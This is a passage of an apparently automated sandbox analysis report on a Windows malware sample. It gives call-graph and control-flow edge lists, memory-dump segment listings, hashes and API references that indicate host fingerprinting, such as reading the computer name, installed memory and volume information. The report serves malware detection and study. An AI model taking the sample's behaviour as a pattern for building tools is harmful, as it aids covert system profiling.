6ae43e 13177->13178 13182 6b0f10 LdrInitializeThunk 13177->13182 13178->13176 13181->13173 13182->13178 13183 6b154c 13184 6b1580 13183->13184 13187 6b0f10 LdrInitializeThunk 13184->13187 13186 6b15f4 13187->13186 13188 6b4c40 13189 6b4c60 13188->13189 13191 6b4d3f 13189->13191 13192 6b0f10 LdrInitializeThunk 13189->13192 13192->13191 13193 6935c2 13194 6935d0 13193->13194 13195 6b46d0 LdrInitializeThunk 13194->13195 13196 693626 13195->13196 13197 6b46d0 LdrInitializeThunk 13196->13197 13197->13196 13198 6a4ac6 CoSetProxyBlanket 13209 6a15dc 13210 6a14c3 13209->13210 13212 6a14db 13210->13212 13213 6ab7b0 13210->13213 13214 6ab7d8 13213->13214 13217 6ab8bf 13214->13217 13222 6b0f10 LdrInitializeThunk 13214->13222 13218 6abb08 13217->13218 13219 6ab9dc 13217->13219 13221 6b0f10 LdrInitializeThunk 13217->13221 13218->13212 13219->13218 13223 6b0f10 LdrInitializeThunk 13219->13223 13221->13217 13222->13214 13223->13219 13224 67cf90 13227 67cfb0 13224->13227 13225 67d1c4 ExitProcess 13226 67d1ba 13226->13225 13227->13225 13227->13226 13231 67e1a0 13227->13231 13229 67d1b1 13229->13226 13237 680b90 CoInitializeEx 13229->13237 13236 67e1c0 13231->13236 13232 67ec20 RtlFreeHeap 13232->13236 13233 6ae210 RtlFreeHeap 13234 67e284 13233->13234 13234->13229 13235 67e485 13235->13233 13235->13234 13236->13232 13236->13234 13236->13235 13238 69f9d0 13239 6b3a90 13238->13239 13240 69f9e3 GetComputerNameExA 13239->13240 13241 69fa30 13240->13241 13241->13241 13242 69fa9f GetComputerNameExA 13241->13242 13243 69fae0 13242->13243 13244 6a032a GetPhysicallyInstalledSystemMemory 13243->13244 13246 6a0349 13244->13246 13245 6a07c9 13246->13245 13248 6b0f10 LdrInitializeThunk 13246->13248 13248->13246 13249 69a510 13250 6b5040 3 API calls 13249->13250 13251 69a490 13250->13251 13251->13249 13252 69a3a0 13251->13252 13253 69a06f 13252->13253 13255 6b0f10 LdrInitializeThunk 13252->13255 13255->13253

                                                                                    Executed Functions

                                                                                    Function 0067EC20 Relevance: 20.4, Strings: 16, Instructions: 397COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 8 67ec20-67ec51 9 67ec60-67eca2 8->9 9->9 10 67eca4-67ed9f 9->10 11 67eda0-67eda8 10->11 11->11 12 67edaa-67eddf 11->12 13 67ede0-67ee1f 12->13 13->13 14 67ee21-67ee46 call 67fa80 13->14 16 67ee4b-67ee50 14->16 17 67ee56-67ee79 16->17 18 67efb4-67efb6 16->18 19 67ee80-67eed2 17->19 20 67f13a-67f146 18->20 19->19 21 67eed4-67eeda 19->21 22 67eee0-67eeea 21->22 23 67eef1-67eef5 22->23 24 67eeec-67eeef 22->24 25 67f131-67f137 call 6ae210 23->25 26 67eefb-67ef1f 23->26 24->22 24->23 25->20 27 67ef20-67ef67 26->27 27->27 29 67ef69-67ef79 27->29 31 67efbb-67efbd 29->31 32 67ef7b-67ef81 29->32 33 67efc3-67efff 31->33 34 67f12f 31->34 35 67ef97-67ef9b 32->35 36 67f000-67f025 33->36 34->25 35->34 37 67efa1-67efa8 35->37 36->36 38 67f027-67f033 36->38 39 67efae 37->39 40 67efaa-67efac 37->40 41 67f035-67f03f 38->41 42 67f074-67f076 38->42 43 67ef90-67ef95 39->43 44 67efb0-67efb2 39->44 40->39 45 67f057-67f05b 41->45 42->34 46 67f07c-67f099 42->46 43->31 43->35 44->43 45->34 47 67f061-67f068 45->47 48 67f0a0-67f0ba 46->48 49 67f06e 47->49 50 67f06a-67f06c 47->50 48->48 51 67f0bc-67f0c6 48->51 52 67f050-67f055 49->52 53 67f070-67f072 49->53 50->49 54 67f100-67f102 51->54 55 67f0c8-67f0d7 51->55 52->42 52->45 53->52 57 67f10c-67f12d call 67e990 54->57 56 67f0e7-67f0eb 55->56 56->34 58 67f0ed-67f0f4 56->58 57->25 60 67f0f6-67f0f8 58->60 61 67f0fa 58->61 60->61 63 67f0e0-67f0e5 61->63 64 67f0fc-67f0fe 61->64 63->56 65 67f104-67f10a 63->65 64->63 65->34 65->57
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                                    • API String ID: 0-600622405
                                                                                    • Opcode ID: 67326e9d6117755e3c9131c3067e15e2ced5fcf746f1a96b178e5da4d8fe5ca1
                                                                                    • Instruction ID: 31ecaf1aab1732f2eede992ddb0d99cde1caaeb7515dd50ae659341b3316bbae
                                                                                    • Opcode Fuzzy Hash: 67326e9d6117755e3c9131c3067e15e2ced5fcf746f1a96b178e5da4d8fe5ca1
                                                                                    • Instruction Fuzzy Hash: DED1067160C3918FC724CF24D4907ABBBE2ABD6314F18C96DE4D94B352D776890ACB92
                                                                                    Function 006ABCA9 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 350memoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 123 6abca9-6abcef 124 6abcf0-6abd16 123->124 124->124 125 6abd18-6abd4e SysAllocString 124->125 127 6abf0a-6abf6f 125->127 128 6abec9-6abee5 125->128 129 6ac06f-6ac078 call 67c890 125->129 130 6ac10f-6ac119 125->130 131 6abfcc-6ac00b call 6a21d0 call 67c880 call 67d2b0 125->131 132 6ac062 125->132 133 6ac020-6ac04b 125->133 134 6ac107-6ac10e 125->134 135 6ac0ba-6ac100 call 6b3a90 GetVolumeInformationW 125->135 136 6ac09a-6ac0ac SysFreeString * 2 125->136 137 6ac07b-6ac08c 125->137 138 6abd79-6abd96 125->138 139 6ac052-6ac05b 125->139 140 6ac0b0-6ac0b6 125->140 141 6ac090-6ac096 125->141 142 6abd55-6abd72 CoSetProxyBlanket 125->142 154 6abf70-6abf94 127->154 152 6abee9-6abf03 128->152 129->137 143 6ac120-6ac13a 130->143 131->129 131->130 131->132 131->133 131->134 131->137 131->139 132->129 133->129 133->130 133->132 133->134 133->137 133->139 135->130 135->134 136->140 137->141 146 6abda0-6abdc8 138->146 139->129 139->130 139->132 139->133 139->134 139->137 139->139 140->135 141->136 142->127 142->128 142->129 142->130 142->131 142->132 142->133 142->134 142->136 142->137 142->138 142->139 142->140 142->141 143->134 159 6ac14f-6ac159 143->159 160 6ac160-6ac165 143->160 161 6ac141-6ac148 143->161 146->146 149 6abdca-6abe53 146->149 167 6abe60-6abe90 149->167 152->127 152->129 152->130 152->131 152->132 152->133 152->134 152->137 152->139 152->141 154->154 158 6abf96-6abfab 154->158 191 6abfaf-6abfc5 158->191 159->160 168 6ac32a-6ac32f 159->168 169 6ac3ec-6ac42d call 6ae4e0 159->169 170 6ac180 159->170 171 6ac440-6ac44a call 6ae510 159->171 172 6ac1e1-6ac1e6 159->172 173 6ac466-6ac46e call 6ae700 159->173 174 6ac486-6ac48e 159->174 175 6ac239-6ac25b call 6ae1b0 159->175 176 6ac45c 159->176 177 6ac172-6ac174 159->177 178 6ac1d2-6ac1da 159->178 179 6ac232-6ac234 159->179 180 6ac332-6ac34b call 6ae210 159->180 181 6ac473-6ac480 call 6ae700 159->181 182 6ac170 159->182 183 6ac1d0 159->183 184 6ac1f0 159->184 185 6ac330 159->185 186 6ac450-6ac455 159->186 187 6ac3d0 159->187 188 6ac311-6ac323 159->188 189 6ac1f6-6ac1fa 159->189 190 6ac436-6ac43b call 6ae510 159->190 160->182 161->159 161->160 167->167 205 6abe92-6abeb5 167->205 168->185 169->190 206 6ac183-6ac1a7 call 692dd0 170->206 171->186 192 6ac1c0-6ac1c6 172->192 173->181 197 6ac3d4-6ac3e5 call 6ae650 174->197 214 6ac260-6ac2a2 175->214 176->173 177->206 178->168 178->169 178->171 178->172 178->173 178->174 178->175 178->176 178->179 178->180 178->181 178->184 178->185 178->186 178->187 178->188 178->189 178->190 193 6ac4b2-6ac4b9 179->193 215 6ac350-6ac392 180->215 181->174 183->178 184->189 186->173 186->174 186->176 186->181 186->187 202 6ac787-6ac797 186->202 187->197 188->168 188->169 188->171 188->173 188->174 188->176 188->180 188->181 188->185 188->186 188->187 188->190 189->143 190->171 191->129 191->130 191->131 191->132 191->133 191->134 191->137 191->139 192->183 197->168 197->169 197->171 197->173 197->174 197->176 197->180 197->181 197->185 197->186 197->187 197->190 197->202 218 6ac799 202->218 227 6abeb9-6abec2 205->227 222 6ac1b0-6ac1b8 206->222 214->214 220 6ac2a4-6ac2b0 214->220 215->215 221 6ac394-6ac39c 215->221 218->218 223 6ac2fa-6ac30a 220->223 224 6ac2b2-6ac2ba 220->224 225 6ac4ad-6ac4b0 221->225 226 6ac3a2-6ac3af 221->226 222->222 228 6ac1ba-6ac1bf 222->228 223->168 223->169 223->171 223->173 223->174 223->176 223->180 223->181 223->185 223->186 223->187 223->188 223->190 229 6ac2c0-6ac2c7 224->229 225->193 230 6ac3b0-6ac3b7 226->230 227->127 227->128 227->129 227->130 227->131 227->132 227->133 227->134 227->136 227->137 227->139 227->141 228->192 231 6ac2c9-6ac2cc 229->231 232 6ac2d0-6ac2d6 229->232 233 6ac3bd-6ac3c0 230->233 234 6ac493-6ac499 230->234 231->229 237 6ac2ce 231->237 232->223 236 6ac2d8-6ac2f7 call 6b0f10 232->236 233->230 238 6ac3c2 233->238 234->225 235 6ac49b-6ac4aa call 6b0f10 234->235 235->225 236->223 237->223 238->225
                                                                                    APIs
                                                                                    • SysAllocString.OLEAUT32(49FB4BE2), ref: 006ABD1E
                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 006ABD67
                                                                                    • SysFreeString.OLEAUT32(?), ref: 006AC0A4
                                                                                    • SysFreeString.OLEAUT32(?), ref: 006AC0AA
                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,49FB4BE2,00000000,00000000,00000000,00000000), ref: 006AC0F7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237549256.00000000008D9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237567237.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237586898.00000000008E8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237605557.00000000008E9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237621299.00000000008EA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237639718.00000000008EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237659118.00000000008FD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237673768.00000000008FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237693759.00000000008FF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237713660.0000000000901000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237741767.000000000091D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237757820.000000000092A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237795094.0000000000959000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237810340.000000000095A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.000000000095B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237826250.0000000000962000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237860024.0000000000970000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237873370.0000000000971000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_670000_file.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                    • String ID: WC$ZQ
                                                                                    • API String ID: 1773362589-1722601914
                                                                                    • Opcode ID: c99729cc89ed697d0005dc694c334d0a2429dbf6ddfa1bd54177023730c478ee
                                                                                    • Instruction ID: 7d9f8161dede76261a715339e496cded9b7178f85078857dfef61eb24d137d64
                                                                                    • Opcode Fuzzy Hash: c99729cc89ed697d0005dc694c334d0a2429dbf6ddfa1bd54177023730c478ee
                                                                                    • Instruction Fuzzy Hash: 38C1DCB2508341ABE310DF60D845B5BBBE6FFC6314F14991CF1849B2A1DB75990ACB82
                                                                                    Function 0067E1A0 Relevance: 11.8, Strings: 9, Instructions: 540COMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 243 67e1a0-67e1bf 244 67e1c0-67e1ef 243->244 244->244 245 67e1f1-67e22f 244->245 246 67e230-67e263 245->246 246->246 247 67e265-67e26c 246->247 248 67e26f-67e27d call 6afc50 247->248 251 67e485-67e491 248->251 252 67e284-67e286 248->252 253 67e3e2-67e3ea 248->253 254 67e602-67e64f 248->254 255 67e3e0 248->255 256 67e3c0-67e3c5 248->256 257 67e5ee-67e5f2 248->257 258 67e3cc-67e3d4 248->258 259 67e28b-67e3be call 6b3a90 * 12 248->259 260 67e449-67e456 248->260 261 67e5f7 248->261 262 67e3f1-67e415 call 6ac620 call 67e990 248->262 263 67e430-67e436 call 67ec20 248->263 264 67e43f-67e442 248->264 265 67e41e-67e427 call 67ec20 248->265 266 67e5fc 248->266 267 67e498-67e59f 248->267 251->254 251->257 251->261 251->266 251->267 270 67e736-67e73b 251->270 271 67e742-67e749 251->271 272 67e740 251->272 273 67e66f-67e6bf 251->273 275 67e97b-67e985 252->275 253->251 253->254 253->256 253->257 253->258 253->260 253->261 253->262 253->263 253->264 253->265 253->266 253->267 253->270 253->271 253->272 253->273 269 67e650-67e66d 254->269 255->253 256->251 256->254 256->257 256->258 256->261 256->266 256->267 256->270 256->271 256->272 256->273 268 67e976-67e978 257->268 258->255 259->255 279 67e471-67e47e 260->279 280 67e458-67e45a 260->280 261->266 262->265 263->264 264->251 264->254 264->256 264->257 264->258 264->260 264->261 264->266 264->267 264->270 264->271 264->272 264->273 265->263 281 67e5a0-67e5cf 267->281 268->275 269->269 269->273 270->272 287 67e8b6-67e8d4 call 67e990 271->287 288 67e962-67e974 call 6ae210 271->288 289 67e952-67e957 271->289 290 67e852-67e859 271->290 291 67e750-67e771 271->291 292 67e810-67e818 271->292 293 67e850 271->293 294 67e860-67e878 271->294 282 67e6c0-67e6dd 273->282 279->251 279->254 279->257 279->258 279->261 279->266 279->267 279->270 279->271 279->272 279->273 295 67e460-67e46f 280->295 281->281 296 67e5d1-67e5e7 call 67f190 281->296 282->282 298 67e6df-67e6ea 282->298 303 67e950 287->303 288->268 304 67e960 289->304 290->287 290->294 309 67e780-67e7c3 291->309 297 67e820-67e82a 292->297 294->288 294->289 300 67e892-67e8b4 294->300 301 67e840-67e84f 294->301 302 67e890 294->302 294->303 294->304 305 67e87f-67e882 294->305 295->279 295->295 296->254 296->257 296->266 296->270 296->271 296->272 296->273 296->287 296->288 296->289 296->290 296->291 296->292 296->293 296->294 297->297 311 67e82c-67e83e 297->311 312 67e720 298->312 313 67e6ec-67e6f0 298->313 300->301 301->293 303->289 305->302 309->309 318 67e7c5-67e7ce 309->318 311->293 325 67e728 312->325 320 67e707-67e70b 313->320 322 67e802-67e809 318->322 323 67e7d0-67e7da 318->323 324 67e70d-67e714 320->324 320->325 322->287 322->289 322->290 322->292 322->293 322->294 327 67e7e7-67e7eb 323->327 328 67e716-67e718 324->328 329 67e71a 324->329 336 67e730 325->336 331 67e800 327->331 332 67e7ed-67e7f4 327->332 328->329 333 67e700-67e705 329->333 334 67e71c-67e71e 329->334 331->322 337 67e7f6-67e7f8 332->337 338 67e7fa 332->338 333->320 333->336 334->333 336->270 337->338 339 67e7e0-67e7e5 338->339 340 67e7fc-67e7fe 338->340 339->322 339->327 340->339
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2236918779.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2236902586.0000000000670000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236955030.00000000006C9000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236971136.00000000006CB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2236989735.00000000006D5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237005329.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237019470.00000000006D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237117805.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237136120.0000000000825000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237157484.000000000083F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237172969.0000000000840000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000843000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237188036.0000000000849000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237237264.0000000000866000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237255459.0000000000867000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237272717.0000000000879000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237286526.000000000087A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237304617.000000000087E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237322539.000000000087F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237338439.0000000000886000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237354216.0000000000891000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237374097.00000000008A6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237391115.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237406336.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237421766.00000000008B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237435768.00000000008B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237453537.00000000008BB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237473023.00000000008CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237490982.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237505383.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2237526500.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
